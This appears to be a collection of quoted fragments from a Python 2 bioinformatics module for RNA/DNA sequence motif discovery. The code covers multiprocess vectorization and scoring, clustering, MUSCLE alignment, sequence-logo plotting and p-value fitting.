"%d fragments' % len(subsequences)) n = multiprocessing.cpu_count() pos_block_size = len(subsequences) / n data_matrix",
"'Cluster %d (#%d) (%.2f secs)' % (cluster_id, len(clusters[cluster_id]), dtime)) logger.debug('After motives computation, %d",
"'#### Motif id: %d' % cluster_id txt.append(info) logo_image, logo_txts = self.compute_logo( cluster_id, motif=motives[cluster_id])",
"np.zeros(row.shape) row[i] = 0 cooccurence_list.append(row) norm_cooccurence_mtx = np.vstack(cooccurence_list) return orig_cooccurence_mtx, norm_cooccurence_mtx, distances def",
"options.scale_width = scale_stack_widths options.show_errorbars = error_bars if title: options.title = title if figure_label:",
"logger.debug('Length mismatch: %d != %d' % (len(sig), median_len)) if sigs is None: if",
"j in ms: if motives.get(i, None) and motives.get(j, None): n_i = len(motives[i]['seqs']) n_j",
"np from scipy.sparse import vstack from eden.util.iterated_maximum_subarray import compute_max_subarrays_sequence from itertools import izip",
"show_x_axis=True, x_label='', show_y_axis=True, y_label='', y_axis_tic_spacing=1.0, show_ends=False, # ['auto','base','pairing','charge','chemistry','classic','monochrome'] color_scheme='classic', resolution=96, fineprint='', ): \"\"\"Initialize",
"= None plt.show() plt.close() return figname def mean_shift_decomposition(sig, half_windw_size=5): \"\"\"mean_shift_decomposition.\"\"\" sig_len = len(sig)",
"motif_seqs[id] = out[i + 1] return zip(headers, motif_seqs) def transform(self, seqs=[]): \"\"\"Carry out",
"logger.debug('Exception', exc_info=True) def fit_decomposition(self, seqs=None): \"\"\"fit_decomposition.\"\"\" self.a, self.b = -4, 1 scores =",
"motives def compute_logo(self, cluster_id=None, motif=None): \"\"\"compute_logo.\"\"\" alphabet = 'rna' color_scheme = 'classic' wb",
"== 0: logger.warning('Quality filter is too strict. Ignoring filter.') return motives else: logger.debug('After",
"multiprocess_subarray( seqs, vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs) for header, seq in subarrays_items:",
"pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(pos_iterable, pos_block_size)] neg_results = [apply_async( pool,",
"score except Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True)",
"(len(sig), median_len)) if sigs is None: if len(sig) >= median_len: sigs = sig[:median_len]",
"values' % (len(scores))) logger.debug('Optimal params: a:%.2f b:%.2f' % (self.a, self.b)) def compute_p_value(self, value):",
"= min_subarray_size self.max_subarray_size = max_subarray_size self.pos_block_size = pos_block_size self.neg_block_size = neg_block_size self.n_jobs =",
"info = ' - freq of occurrences of regex: %.2f' % (fr) txt.append(info)",
"None: params['maxhours'] = self.maxhours muscle_cline = MuscleCommandline(**params) stdout, stderr = muscle_cline(stdin=data) return stdout",
"if line[0] == '>': if seq: yield seq seq = \"\" line_str =",
"n_jobs=self.n_jobs): yield score except Exception as e: logger.debug('Failed iteration. Reason: %s' % e)",
"100%\"></p>') else: if output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url + '\"></p>')",
"pylab as plt import joblib from scipy.optimize import curve_fit import multiprocessing logger =",
"time.time() scores_items = [] for i, p in enumerate(results): loc_start_time = time.time() scores",
"True: params['diags'] = True if self.maxhours is not None: params['maxhours'] = self.maxhours muscle_cline",
"regex_th=regex_th, sample_size=sample_size) if is_high_quality: motives[cluster_id] = motif dtime = time.time() - start_time logger.debug(",
"-1]) if n_jobs == -1: pool = mp.Pool() else: pool = mp.Pool(n_jobs) pos_results",
"mp.Pool(n_jobs) results = [apply_async( pool, serial_score, args=(seqs, vectorizer, estimator)) for seqs in chunks(iterable,",
"iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def score(self, seqs=None): \"\"\"fit.\"\"\" try: for",
"d_loc_time)) pool.close() pool.join() preds = np.hstack(preds) binary_preds = np.hstack(binary_preds) true_targets = np.hstack(true_targets) return",
"subseqs = [] for subarray in subarrays: subseq_seq = subarray['subarray_string'] begin = subarray['begin']",
"else: return False, None def compute_motives(self, clusters, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motives.\"\"\"",
"eden.util.NeedlemanWunsh import edit_distance import random import pylab as plt import joblib from scipy.optimize",
"self.diags is True: params['diags'] = True if self.maxhours is not None: params['maxhours'] =",
"avg motives[cluster_id]['std_pos'] = std if freq_th is None or freq >= freq_th: if",
"= loc.split(':') begin = int(begin) end = int(end) subseq = header.split('<subseq>')[1] orig_header =",
"= len(sig) for i in range(half_windw_size, sig_len - half_windw_size): min_sig = np.min(sig[i -",
"= self.class_estimator.predict(data_matrix) else: preds = self.clusterer.fit_predict(data_matrix) self.class_estimator.fit(data_matrix, preds) self.clusterer_is_fit = True dtime =",
"return p_val def ecdf(x): \"\"\"Empirical cumulative distribution function.\"\"\" xs = np.sort(x) ys =",
"if line_str: seq += str(line_str[0]).strip() if seq: yield seq # ------------------------------------------------------------------------------ class MuscleAlignWrapper(object):",
"= motives[cluster_id]['avg_pos'] st = motives[cluster_id]['std_pos'] info = ' - average location: %.1f +-",
"enumerate(instances): instances_seqrecord.append( SeqRecord(Seq(j, self.alphabet), id=str(i))) handle = StringIO() SeqIO.write(instances_seqrecord, handle, \"fasta\") data =",
"secs' % (time.time() - start_time)) logger.debug('Predicting') start_time = time.time() scores_items = [] for",
"p_value=0.05): \"\"\"compute_clusters.\"\"\" try: subsequences = [] iterable = self.decompose(seqs, p_value=p_value) for header, begin,",
"Reason: %s' % e) logger.debug('Exception', exc_info=True) def decomposition_scores(self, seqs=None): \"\"\"decomposition_scores.\"\"\" try: subarrays_items =",
"counts, freq = occurrences(c_regex, seqs) yield freq, id, c_regex, counts, motives[id]['consensus_seq'] def plot_location(needle,",
"else: logger.warning( 'No motives to report. Try more permissive parameters.') txt = '\\n'.join(txt)",
"False def save(self, model_name): \"\"\"save.\"\"\" joblib.dump(self, model_name, compress=1) def load(self, obj): \"\"\"load.\"\"\" self.__dict__.update(joblib.load(obj).__dict__)",
"def sigmoid(x, a, b): \"\"\"sigmoid.\"\"\" return 1 / (1 + np.exp(-(x - a)",
"None: ids = [id for id in motives] seqs_summary = defaultdict(list) for seq_id,",
"src=\"file://' + url + '\" style=\"width: 100%\"></p>') else: txt.append('<p align=\"left\"><img src=\"' + fname",
"in enumerate(results): loc_start_time = time.time() scores = p.get() scores_items += scores d_time =",
"in to_be_removed] trimmed_align_seqs.append((h, ''.join(trimmed_align_seq))) return score, trimmed_align_seqs def _is_high_quality(self, seqs, min_score=4, min_freq=0.6, min_cluster_size=10,",
"roc logger.info('ROC: %.3f' % (metrics.roc_auc_score(y_test, y_pred))) except Exception as e: logger.debug('Failed iteration. Reason:",
"h, s in haystack: for match in re.finditer(needle, s): s = match.start() e",
"over-rides tool.alphabet alphabet='dna', # ['dna', 'rna', 'protein'] ): \"\"\"Initialize an instance.\"\"\" self.diags =",
"def decomposition_scores(self, seqs=None): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray( seqs, vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size,",
"s in clusters[cluster_id]] seq = sep.join(seqs) cluster_seqs.append(seq) # vectorize the seqs and compute",
"in subarrays_items: components = self._decompose_header(header) orig_header, score, begin, end, subseq = components p",
"import edit_distance import random import pylab as plt import joblib from scipy.optimize import",
"(self.a, self.b)) def predict(self, value): \"\"\"pvalue.\"\"\" y = sigmoid(value, self.a, self.b) p_val =",
"n) in enumerate(izip(pos_results, neg_results)): loc_start_time = time.time() pos_data_matrix = p.get() y = [1]",
"% (time.time() - start_time)) logger.debug('Predicting') start_time = time.time() scores_items = [] for i,",
"stdout, stderr = muscle_cline(stdin=data) return stdout def _fasta_to_seqs(self, headers, stdout): out = list(_fasta_to_fasta(stdout.split('\\n')))",
"% e) logger.debug('Exception', exc_info=True) def performance(self, pos_seqs=None, neg_seqs=None): \"\"\"performance.\"\"\" try: y_pred, y_binary, y_test",
"extract_location(needle, haystack): \"\"\"extract_location.\"\"\" locs = [] for h, s in haystack: for match",
"self.__dict__.update(joblib.load(obj).__dict__) def fit(self, pos_seqs=None, neg_seqs=None): \"\"\"fit.\"\"\" try: self.estimator = multiprocess_fit( pos_seqs, neg_seqs, vectorizer=self.vectorizer,",
"+= scores d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time logger.debug('%d",
"for h, s in haystack: for match in re.finditer(needle, s): s = match.start()",
"cluster_vecs = Vectorizer(complexity).transform(cluster_seqs) gram_matrix = metrics.pairwise.pairwise_kernels( cluster_vecs, metric='linear') c = linkage(gram_matrix, method='single') orders",
"' * (complexity * 2) # join all sequences in a cluster with",
"in motives) + 1 cooccurence_mtx = np.zeros((size, size)) for seq_id in sorted(seqs_summary): cluster_ids",
"d_time, d_loc_time)) pool.close() pool.join() return estimator def multiprocess_performance(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100,",
"subseq = header.split('<subseq>')[1] orig_header = header.split('<loc>')[0] return orig_header, score, begin, end, subseq def",
"[s for h, s in clusters[cluster_id]] seq = sep.join(seqs) cluster_seqs.append(seq) # vectorize the",
"j > i: seq_i = motives[i]['consensus_seq'] seq_j = motives[j]['consensus_seq'] nw_score = edit_distance(seq_i, seq_j,",
"multiprocess_score(seqs, vectorizer=self.vectorizer, estimator=self.estimator, block_size=self.pos_block_size, n_jobs=self.n_jobs): yield score except Exception as e: logger.debug('Failed iteration.",
"<NAME> @email: <EMAIL> \"\"\" import logging import multiprocessing as mp import os from",
"pad_inches=0) else: figname = None plt.show() plt.close() return figname def extract_location(needle, haystack): \"\"\"extract_location.\"\"\"",
"annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) scores = [score for seq, score in annotated_seqs] return",
"(#%d), %d (#%d) score: %.2f' % \\ (i, n_i, j, n_j, rel_nw_score) info2",
"= [] for h, s in haystack: for match in re.finditer(needle, s): s",
"end = subarray['end'] score = subarray['score'] header = orig_header header += '<loc>%d:%d<loc>' %",
"line_str: seq += str(line_str[0]).strip() if seq: yield seq # ------------------------------------------------------------------------------ class MuscleAlignWrapper(object): \"\"\"A",
"seqs, vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs) for header, seq in subarrays_items: components",
"= time.time() classes = np.array([1, -1]) if n_jobs == -1: pool = mp.Pool()",
"fname: plt.draw() figname = '%s_importance.png' % (fname) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else:",
"reverting to default values') logger.debug('ECDF fit on %d values' % (len(scores))) logger.debug('Optimal params:",
"neg_data_matrix.shape[0] y = np.array(y) true_targets.append(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) pred = estimator.decision_function(data_matrix) preds.append(pred)",
"fname=None): \"\"\"plot_location.\"\"\" locs = [] for h, s in haystack: for match in",
"time.time() - start_time d_loc_time = time.time() - loc_start_time size = pos_data_matrix.shape logger.debug('%d %s",
"np.percentile(locs, 50) std_loc = np.percentile(locs, 70) - np.percentile(locs, 30) else: avg_loc = -1",
"= [score for header, score, begin, end, subseq in self.decomposition_scores(seqs)] if scores: xs,",
"logos else: logger.warning( 'No logo to compute. Try more permissive parameters.') def _save_logo(self,",
"url = pwd + '/' + fname txt = [] if fill_width: if",
"j in cluster_ids: cooccurence_mtx[i, j] += 1 if i != j: # find",
"(%.2f secs) (delta: %.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join() data_matrix =",
"scores = [score for seq, score in annotated_seqs] return scores def multiprocess_score(iterable, vectorizer=None,",
"else: line_str = line.split() if line_str: seq += str(line_str[0]).strip() if seq: yield seq",
"Alphabet('ACGU') elif self.options.sequence_type is 'protein': alphabet = Alphabet('ACDEFGHIKLMNPQRSTVWY') else: alphabet = Alphabet('AGCT') motif_corebio",
"sorted([m for m in self._identify_mergeable_clusters( motives, similarity_th=similarity_th)], reverse=True) success = False for rel_nw_score,",
"% (fname) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None plt.show() plt.close()",
"regex_i = motives[i]['regex_seq'] if j != cluster_id: regex_j = motives[j]['regex_seq'] ds = distances[(cluster_id,",
"units options.first_index = first_position if logo_range: options.logo_start = logo_range[0] options.logo_end = logo_range[1] options.scale_width",
"50) std_loc = np.percentile(locs, 70) - np.percentile(locs, 30) else: avg_loc = -1 std_loc",
"k = c.most_common() if k[0][0] == '-': to_be_removed.append(i) val = k[1][1] else: val",
"seqs=None, p_value=0.05, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200, freq_th=None, std_th=None): \"\"\"select_motives.\"\"\" orig_clusters =",
"logger.debug('...done in %.2f secs' % (dtime)) self.clusters = defaultdict(list) for pred, seq in",
"all sequences in a cluster with enough space that # kmers dont interfere",
"np.exp(-(x - a) / b)) class PValueEvaluator(object): \"\"\"Fit a parametrized sigmoid on the",
"return imagename def _wrap_image(self, fname, fill_width=True, output_type='screen'): pwd = os.getcwd() url = pwd",
"seqs_summary[seq_id].append((begin, end, i)) distances = defaultdict(list) size = max(id for id in motives)",
"(time.time() - start_time)) logger.debug('Fitting') start_time = time.time() for i, (p, n) in enumerate(izip(pos_results,",
"edit_distance(seq_i, seq_j, gap_penalty=-1) rel_nw_score = 2 * nw_score / (len(seq_i) + len(seq_j)) if",
"Reason: %s' % e) logger.debug('Exception', exc_info=True) def score(self, seqs=None): \"\"\"fit.\"\"\" try: for score",
"'%s_importance.png' % (fname) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None plt.show()",
"= s + (e - s) / 2 locs.append(m) if locs: avg_loc =",
"results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(iterable, pos_block_size)] logger.debug('Setup",
"trimmed_align_seqs = self._compute_score(align_seqs, min_freq=min_freq) if score >= min_score and len(align_seqs) > min_cluster_size: consensus_seq",
"vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) # confusion matrix cm = metrics.confusion_matrix(y_test, y_binary) np.set_printoptions(precision=2)",
"score, trimmed_align_seqs def _is_high_quality(self, seqs, min_score=4, min_freq=0.6, min_cluster_size=10, sample_size=200): ma = MuscleAlignWrapper(alphabet='rna') if",
"fname=None): \"\"\"plot_cumulative_score.\"\"\" sig = cumulative_score(seqs, smod) plt.figure(figsize=size) sigp = np.copy(sig) sigp[sigp < 0]",
"dtime)) logger.debug('After motives computation, %d motives' % len(motives)) return motives def _identify_mergeable_clusters(self, motives,",
"%s vs %d %s: %d' % \\ (cluster_id, regex_i, j, regex_j, len(ds)) txt.append(info)",
"for j in cluster_ids: cooccurence_mtx[i, j] += 1 if i != j: #",
"xs, ys = self.ecdf(scores) popt, pcov = curve_fit(sigmoid, xs, ys) self.a, self.b =",
"regex_th=.3, sample_size=200, freq_th=None, std_th=None): \"\"\"select_motives.\"\"\" orig_clusters = self.compute_clusters(seqs, p_value=p_value) motives = self.compute_motives( orig_clusters,",
"n_clusters self.min_subarray_size = min_subarray_size self.max_subarray_size = max_subarray_size self.pos_block_size = pos_block_size self.neg_block_size = neg_block_size",
"binary_preds = np.hstack(binary_preds) true_targets = np.hstack(true_targets) return preds, binary_preds, true_targets def serial_subarray(iterable, vectorizer=None,",
"_is_high_quality(self, seqs, min_score=4, min_freq=0.6, min_cluster_size=10, sample_size=200): ma = MuscleAlignWrapper(alphabet='rna') if len(seqs) > sample_size:",
"for seqs in chunks(pos_iterable, pos_block_size)] neg_results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for",
"options.stacks_per_line = stacks_per_line options.sequence_type = sequence_type options.ignore_lower_case = ignore_lower_case options.unit_name = units options.first_index",
"cluster_id in ids: logo_image, logo_txt = self.compute_logo( cluster_id=cluster_id, motif=motives[cluster_id]) logos[cluster_id] = (logo_image, logo_txt)",
"= [s for h, s in clusters[cluster_id]] seq = sep.join(seqs) cluster_seqs.append(seq) # vectorize",
"= multiprocess_performance( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) # confusion matrix cm",
"width = end - start val = sum(sig[start:end]) yield val, start, end, width",
"= time.time() subarrays_items = [] for i, p in enumerate(results): loc_start_time = time.time()",
"e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def decomposition_scores(self, seqs=None): \"\"\"decomposition_scores.\"\"\"",
"_fasta_to_seqs(self, headers, stdout): out = list(_fasta_to_fasta(stdout.split('\\n'))) motif_seqs = [''] * len(headers) for i",
"d_time, d_loc_time)) pool.close() pool.join() return subarrays_items def serial_score(iterable, vectorizer=None, estimator=None): \"\"\"serial_score.\"\"\" annotated_seqs =",
"for begin, end, cluster_id in seqs_summary[seq_id]: centers[cluster_id].append(begin + (end - begin) / 2)",
"similarity_th: yield rel_nw_score, i, j def merge(self, motives, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3,",
"def hits(motives, ids=None): \"\"\"hits.\"\"\" for i in ids: for h, s in motives[i]['seqs']:",
"motives computation, %d motives' % len(motives)) return motives def _identify_mergeable_clusters(self, motives, similarity_th=0.8): for",
"if j > i: seq_i = motives[i]['consensus_seq'] seq_j = motives[j]['consensus_seq'] nw_score = edit_distance(seq_i,",
"else: if len(sig) >= median_len: sigs = sigs + sig[:median_len] sig = np.array(sigs)",
"[] binary_preds = [] true_targets = [] for i, (p, n) in enumerate(izip(pos_results,",
"= vectorizer.transform(iterable) return data_matrix def chunks(iterable, n): \"\"\"chunks.\"\"\" iterable = iter(iterable) while True:",
"np.vstack(cluster) size = len(trimmed_align_seqs) for i, row in enumerate(cluster.T): c = Counter(row) k",
"len(trimmed_align_seqs) for i, row in enumerate(cluster.T): c = Counter(row) k = c.most_common() code",
"motives] logos = dict() for cluster_id in ids: logo_image, logo_txt = self.compute_logo( cluster_id=cluster_id,",
"= dict() for cluster_id in ids: logo_image, logo_txt = self.compute_logo( cluster_id=cluster_id, motif=motives[cluster_id]) logos[cluster_id]",
"weblogolib as wbl from scipy.cluster.hierarchy import linkage import regex as re from collections",
"!= '-': code.append(letter) if len(code) == 0: code_str = None elif len(code) ==",
"= sequence_type options.ignore_lower_case = ignore_lower_case options.unit_name = units options.first_index = first_position if logo_range:",
"def _perform_ma(self, data): params = {'maxiters': 7} if self.diags is True: params['diags'] =",
"zip(*seqs)] instances_seqrecord = [] for i, j in enumerate(instances): instances_seqrecord.append( SeqRecord(Seq(j, self.alphabet), id=str(i)))",
"seqs and compute their gram matrix K cluster_vecs = Vectorizer(complexity).transform(cluster_seqs) gram_matrix = metrics.pairwise.pairwise_kernels(",
"def serial_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10): \"\"\"serial_subarray.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) subarrays_items =",
"self.a = -4 self.b = 1 def ecdf(self, x): \"\"\"Empirical cumulative distribution function.\"\"\"",
"else: row = np.zeros(row.shape) row[i] = 0 cooccurence_list.append(row) norm_cooccurence_mtx = np.vstack(cooccurence_list) return orig_cooccurence_mtx,",
"if figure_label: options.logo_label = figure_label options.show_xaxis = show_x_axis if x_label: options.xaxis_label = x_label",
"= title if figure_label: options.logo_label = figure_label options.show_xaxis = show_x_axis if x_label: options.xaxis_label",
"None or freq >= freq_th: if std_th is None or std <= std_th:",
"= defaultdict(list) for seq_id, begin, end, i in hits(motives, ids=ids): seqs_summary[seq_id].append((begin, end, i))",
"i)) distances = defaultdict(list) size = max(id for id in motives) + 1",
"(delta: %.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join() data_matrix = vstack(matrices) return",
"h, s in seqs]) sigs = None for scores in smod.score(seqs): sig =",
"[] for i in range(n): it = iterable.next() items.append(it) yield items def multiprocess_vectorize(iterable,",
"- loc_start_time logger.debug('%d (%.2f secs) (delta: %.2f)' % (i, d_time, d_loc_time)) pool.close() pool.join()",
"align_seqs, min_freq=0.8): dim = len(align_seqs) cluster = [] for h, align_seq in align_seqs:",
"= vstack([pos_data_matrix, neg_data_matrix]) pred = estimator.decision_function(data_matrix) preds.append(pred) binary_pred = estimator.predict(data_matrix) binary_preds.append(binary_pred) d_time =",
"\"\"\"Fit a parametrized sigmoid on the empirical cumulative distribution.\"\"\" def __init__(self, random_state=1): \"\"\"Constructor.\"\"\"",
"time.time() - start_time logger.debug( 'Cluster %d (#%d) (%.2f secs)' % (cluster_id, len(clusters[cluster_id]), dtime))",
"= orig_header header += '<loc>%d:%d<loc>' % (begin, end) header += '<score>%.4f<score>' % (score)",
"while True: ms = sorted([m for m in self._identify_mergeable_clusters( motives, similarity_th=similarity_th)], reverse=True) success",
"instances_seqrecord.append( SeqRecord(Seq(j, self.alphabet), id=str(i))) handle = StringIO() SeqIO.write(instances_seqrecord, handle, \"fasta\") data = handle.getvalue()",
"header): score = header.split('<score>')[1] score = float(score) loc = header.split('<loc>')[1] begin, end =",
"output_type='screen', fname=None): \"\"\"Report in markdown format.\"\"\" txt = [] if motives: _, norm_cooccurence_mtx,",
"vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10, block_size=100, n_jobs=-1): \"\"\"multiprocess_subarray.\"\"\" start_time = time.time() if n_jobs ==",
"now #%d]' % \\ (j, i, n_i + n_j) logger.debug(info1 + info2) #",
"= header.split('<loc>')[0] return orig_header, score, begin, end, subseq def decompose(self, seqs=None, p_value=0.05): \"\"\"decomposition_scores.\"\"\"",
"= vstack(matrices) return data_matrix def multiprocess_fit(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_fit.\"\"\"",
"count in k: if count / float(size) > regex_th: if letter != '-':",
"= np.arange(1, len(xs) + 1) / float(len(xs)) return xs, ys def letter_regex(k, size,",
"end) header += '<score>%.4f<score>' % (score) header += '<subseq>%s<subseq>' % (subseq_seq) subseq =",
"= len(motives[j]['seqs']) seqs = motives[i]['seqs'] + motives[j]['seqs'] is_high_quality, motif = self.compute_motif( seqs=seqs, min_score=min_score,",
"if letter != '-': code.append(letter) if len(code) == 0: code_str = None elif",
"sig[:median_len] sig = np.array(sigs) / float(len(seqs)) return sig def trim_seqs(seqs, smod, half_windw_size=7): \"\"\"trim_seqs.\"\"\"",
"is True: params['diags'] = True if self.maxhours is not None: params['maxhours'] = self.maxhours",
"p <= p_value: yield orig_header, begin, end, p, subseq except Exception as e:",
"= Weblogo(output_format='png', sequence_type=alphabet, resolution=200, stacks_per_line=60, units='bits', color_scheme=color_scheme) logo_image = wb.create_logo(seqs=motif['trimmed_align_seqs']) logo_txt = []",
"nbins=40, size=(17, 2), output_type='screen', fname=None): \"\"\"Report in markdown format.\"\"\" txt = [] if",
"clusters, complexity=3): sep = ' ' * (complexity * 2) # join all",
"0] = 0 plt.bar(range(len(sigp)), sigp, alpha=0.3, color='g') sign = np.copy(sig) sign[sign >= 0]",
"logger.debug('Exception', exc_info=True) def score(self, seqs=None): \"\"\"fit.\"\"\" try: for score in multiprocess_score(seqs, vectorizer=self.vectorizer, estimator=self.estimator,",
"% (regex_i, regex_j)) plt.xlabel('Relative position') plt.ylabel('Num occurrences') if fname: plt.draw() figname = '%s_dist_%d_vs_%d.png'",
"width)) for h, s in seqs: if s[start:end]: yield (h, s[start:end]) def plot_cumulative_score(smod,",
"in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) score = 0",
"\"\"\"mean_shift_decomposition.\"\"\" sig_len = len(sig) for i in range(half_windw_size, sig_len - half_windw_size): min_sig =",
"motives], reverse=True): info = ' - %.2s %s' % \\ (cluster_id, motives[cluster_id]['consensus_seq']) txt.append(info)",
"as np from scipy.sparse import vstack from eden.util.iterated_maximum_subarray import compute_max_subarrays_sequence from itertools import",
"float(counts) / size def extract_consensus(seqs, motives, regex_th): \"\"\"extract_consensus.\"\"\" for id in motives: c_regex",
"= ' - freq of occurrences of regex: %.2f' % (fr) txt.append(info) av",
"def multiprocess_score(iterable, vectorizer=None, estimator=None, block_size=100, n_jobs=-1): \"\"\"multiprocess_score.\"\"\" start_time = time.time() if n_jobs ==",
"options.yaxis_tic_interval = y_axis_tic_spacing options.show_ends = show_ends options.color_scheme = wbl.std_color_schemes[color_scheme] options.resolution = resolution if",
"eden.sequence import Vectorizer from StringIO import StringIO from Bio import SeqIO from Bio.Align.Applications",
"for i, row in enumerate(cluster.T): c = Counter(row) k = c.most_common() l =",
"len(seq_j)) if rel_nw_score > similarity_th: yield rel_nw_score, i, j def merge(self, motives, similarity_th=0.5,",
"components = self._decompose_header(header) orig_header, score, begin, end, subseq = components p = self.compute_p_value(score)",
"\"\"\"sigmoid.\"\"\" return 1 / (1 + np.exp(-(x - a) / b)) class PValueEvaluator(object):",
"vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_fit.\"\"\" start_time = time.time() classes = np.array([1, -1])",
"= mp.Pool() else: pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_subarray, args=(seqs, vectorizer,",
"class MuscleAlignWrapper(object): \"\"\"A wrapper to perform Muscle Alignment on sequences.\"\"\" def __init__(self, diags=False,",
"return avg_loc, std_loc def hits(motives, ids=None): \"\"\"hits.\"\"\" for i in ids: for h,",
"-4, 1 scores = [score for header, score, begin, end, subseq in self.decomposition_scores(seqs)]",
"\"\"\"fit.\"\"\" try: for score in multiprocess_score(seqs, vectorizer=self.vectorizer, estimator=self.estimator, block_size=self.pos_block_size, n_jobs=self.n_jobs): yield score except",
"for header, seq in subarrays_items: yield self._decompose_header(header) except Exception as e: logger.debug('Failed iteration.",
"sig_len = len(sig) for i in range(half_windw_size, sig_len - half_windw_size): min_sig = np.min(sig[i",
"- num co-occurences %d %s vs %d %s: %d' % \\ (cluster_id, regex_i,",
"in trimmed_align_seqs: str_list = [c for c in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a'))",
"if logo_range: options.logo_start = logo_range[0] options.logo_end = logo_range[1] options.scale_width = scale_stack_widths options.show_errorbars =",
"= (logo_image, logo_txt) return logos else: logger.warning( 'No logo to compute. Try more",
"info = '### Summary: %d motives' % len(motives) txt.append(info) figname = plot_cumulative_score( self,",
"sigmoid(value, self.a, self.b) p_val = 1 - y return p_val def compute_clusters(self, seqs=None,",
"metrics.pairwise.pairwise_kernels( cluster_vecs, metric='linear') c = linkage(gram_matrix, method='single') orders = [] for id1, id2",
"serial_score(iterable, vectorizer=None, estimator=None): \"\"\"serial_score.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) scores = [score for seq,",
"= 0 cooccurence_list.append(row) norm_cooccurence_mtx = np.vstack(cooccurence_list) return orig_cooccurence_mtx, norm_cooccurence_mtx, distances def plot_distance(cluster_id_i, cluster_id_j,",
"align with muscle is_high_quality, motif = self.compute_motif( seqs=clusters[cluster_id], min_score=min_score, min_freq=min_freq, min_cluster_size=mcs, regex_th=regex_th, sample_size=sample_size)",
"preds.append(pred) binary_pred = estimator.predict(data_matrix) binary_preds.append(binary_pred) d_time = time.time() - start_time d_loc_time = time.time()",
"self.maxhours is not None: params['maxhours'] = self.maxhours muscle_cline = MuscleCommandline(**params) stdout, stderr =",
"c in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) seq =",
"def save(self, model_name): \"\"\"save.\"\"\" joblib.dump(self, model_name, compress=1) def load(self, obj): \"\"\"load.\"\"\" self.__dict__.update(joblib.load(obj).__dict__) def",
"%d' % \\ (cluster_id, regex_i, j, regex_j, len(ds)) txt.append(info) if len(ds): figname =",
"return orig_cooccurence_mtx, norm_cooccurence_mtx, distances def plot_distance(cluster_id_i, cluster_id_j, regex_i, regex_j, distances, nbins=5, size=(6, 2),",
"compute_max_subarrays_sequence( seq=seq, score=score, min_subarray_size=min_subarray_size, max_subarray_size=max_subarray_size, margin=1, output='all') subseqs = [] for subarray in",
"line in lines: if line: if line[0] == '>': if seq: yield seq",
"subarray['begin'] end = subarray['end'] score = subarray['score'] header = orig_header header += '<loc>%d:%d<loc>'",
"------------------------------------------------------------------------------ def serial_pre_process(iterable, vectorizer=None): \"\"\"serial_pre_process.\"\"\" data_matrix = vectorizer.transform(iterable) return data_matrix def chunks(iterable, n):",
"subseqs.append(subseq) subarrays_items += subseqs return subarrays_items def multiprocess_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10, block_size=100,",
"%.1f +- %.1f' % (av, st) txt.append(info) txt.append(self._wrap_image(figname, fill_width=False, output_type=output_type)) regex_i = motives[cluster_id]['regex_seq']",
"half_windw_size)) for i in range(len(ids) - 1): start = ids[i] end = ids[i",
"c in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) size =",
"pos_seqs=None, neg_seqs=None): \"\"\"fit.\"\"\" try: self.estimator = multiprocess_fit( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size,",
"cumulative_score(seqs, smod): \"\"\"cumulative_score.\"\"\" median_len = np.median([len(s) for h, s in seqs]) sigs =",
"'/' + fname txt = [] if fill_width: if output_type == 'pdf': txt.append('<p",
"\"\"\"Report in markdown format.\"\"\" txt = [] if motives: _, norm_cooccurence_mtx, distances =",
"' - %.2s %s' % \\ (cluster_id, motives[cluster_id]['consensus_seq']) txt.append(info) for freq, cluster_id in",
